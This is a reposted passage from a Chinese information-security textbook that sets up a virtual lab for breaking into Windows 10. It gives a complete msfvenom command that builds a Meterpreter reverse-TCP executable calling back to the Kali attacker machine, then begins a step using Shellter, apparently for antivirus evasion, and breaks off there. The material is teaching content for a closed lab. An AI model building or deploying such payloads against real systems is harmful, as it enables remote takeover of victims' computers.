信息安全技术实用教程-第4版---张同光---ISBN-9787121423031---4.4实例——入侵Windows10
作者:互联网
信息安全技术实用教程-第4版---张同光---ISBN-9787121423031---4.4实例——入侵Windows10
https://www.cnblogs.com/ztguang/p/12828764.html
主 编: 张同光
ISBN号: 978-7-121-42303-1 9787121423031
出版日期: 2021-11-20
出版社: 电子工业出版社
页码: 定价:¥69.80元
4.4 实例——入侵Windows 10
1.实验环境
实验环境如图4.1所示,使用2个虚拟机(Windows10_1703_x86_en、KaliLinux)和宿主机(Windows 10),2个虚拟机的网络连接方式选择“仅主机(Host-Only)网络”。宿主机和2个虚拟机的IP地址、三个系统之间的网络连通性如图4.2所示。两个虚拟机分别是Kali Linux 2020和Windows 10。Windows 10 1703作为被渗透的目标机,Kali Linux作为攻击机。
图4.1 实验环境
图4.2 三个系统的IP地址及其之间的网络连通性
2.入侵过程
第1步:执行msfvenom命令
如图4.3所示,在Kali Linux终端窗口中执行如下命令:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.56.101 LPORT=4444 -o /root/kali2win10.exe
上面msfvenom命令生成32位Windows可执行文件(kali2win10.exe),该文件实现反向TCP连接,必须指定为.exe类型,并且必须定义本地主机(LHOST)和本地端口(LPORT)。该实例中,LHOST是攻击机的IP地址,LPORT是一个端口,一旦目标机受到攻击,它就会监听目标机的连接。
图4.3 执行msfvenom命令
第2步:下载并运行Shellter
标签:4.4,实用教程,exe,10,Windows,虚拟机,---,msfvenom 来源: https://www.cnblogs.com/ztguang/p/15611952.html